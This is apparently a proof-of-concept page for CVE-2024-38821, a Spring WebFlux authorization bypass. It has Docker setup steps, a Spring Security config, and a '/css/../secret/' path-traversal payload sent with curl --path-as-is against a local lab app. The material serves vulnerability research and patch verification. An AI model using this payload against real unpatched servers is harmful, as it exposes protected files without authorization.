POC详情: 8dec030e406cf8f4363c05ddd879344ccad6f7e7

标题: Spring WebFlux 安全漏洞 (CVE-2024-38821)
描述:Spring WebFlux是Spring公司的一个响应式堆栈 Web 框架。 Spring WebFlux存在安全漏洞,该漏洞源于在特定情况下可以绕过Spring Security对静态资源的授权规则。
# CVE-2024-38821: Proof of Concept (PoC): Authentication Bypass in Spring Framework

This is a proof of concept for the [CVE-2024-38821](https://spring.io/security/cve-2024-38821) vulnerability

## Execution Steps
1. Build the Docker image (Spring Boot 3.3.4, based on Spring Framework 6.1.13)
   cd vuln
   docker build -t cve-2024-38821-poc .
2. Run the container and expose port 8080 to the host machine
   docker run -d -p 8080:8080 --name cve-2024-38821-poc cve-2024-38821-poc
3. Run the following command to execute the PoC and confirm the vulnerability
   curl -v --path-as-is "http://localhost:8080/secret/secret-file.txt" # Expected: 302 response (login required)
   curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt" # Expected: 200 response (bypassed authentication)

   If the attack is successful, the response will display: `This is a secret file.`

## Explanation
1. Create `SecurityConfig.java` to configure access permissions:
    - Allow unauthenticated access to paths under /css/.
    - Require authentication for paths under /secret/.
    public SecurityWebFilterChain securityWebFilterChain(ServerHttpSecurity http) {
        return http
            .authorizeExchange(exchange -> exchange
                .pathMatchers("/css/**", "/").permitAll() // Static resources and the top page do not require authentication
                .pathMatchers("/secret/**").authenticated() // Authentication is required for the "secret" path
                .anyExchange().authenticated() // Authentication is required for all other paths
            .formLogin().and() // Enable form-based authentication
3. Create the following payload. Since the payload starts with /css/, it matches the allowed path pattern. It does not start with /secret/, so it does not match the authentication-required path pattern:
   - Path: `/css/../secret/secret-file.txt`

4. Use the following `curl` command to execute the PoC and verify if the attack is successful:
    # Note: The --path-as-is option is required to send the request without URL normalization.
    curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt"
   If the attack is successful, the response will display: `This is a secret file.`

## Disclaimer
This PoC is provided for educational and security research purposes. Before using this in a real system, ensure the vulnerability has been fixed and you have proper authorization. The author takes no responsibility for any misuse of this code.

[4.0K] /data/pocs/8dec030e406cf8f4363c05ddd879344ccad6f7e7 ├── [1.0K] LICENSE ├── [2.6K] README.md ├── [4.0K] safe │   ├── [ 580] build.gradle │   ├── [ 512] Dockerfile │   └── [4.0K] src │   └── [4.0K] main │   ├── [4.0K] java │   │   └── [4.0K] com │   │   └── [4.0K] example │   │   └── [4.0K] demo │   │   ├── [ 315] DemoApplication.java │   │   └── [ 981] SecurityConfig.java │   └── [4.0K] resources │   ├── [4.0K] static │   │   ├── [4.0K] css │   │   │   └── [ 0] style.css │   │   └── [4.0K] secret │   │   └── [ 22] secret-file.txt │   └── [4.0K] templates │   ├── [ 123] index.html │   └── [ 597] login.html └── [4.0K] vuln ├── [ 580] build.gradle ├── [ 512] Dockerfile └── [4.0K] src └── [4.0K] main ├── [4.0K] java │   └── [4.0K] com │   └── [4.0K] example │   └── [4.0K] demo │   ├── [ 315] DemoApplication.java │   └── [ 981] SecurityConfig.java └── [4.0K] resources ├── [4.0K] static │   ├── [4.0K] css │   │   └── [ 0] style.css │   └── [4.0K] secret │   └── [ 22] secret-file.txt └── [4.0K] templates ├── [ 123] index.html └── [ 597] login.html 24 directories, 18 files
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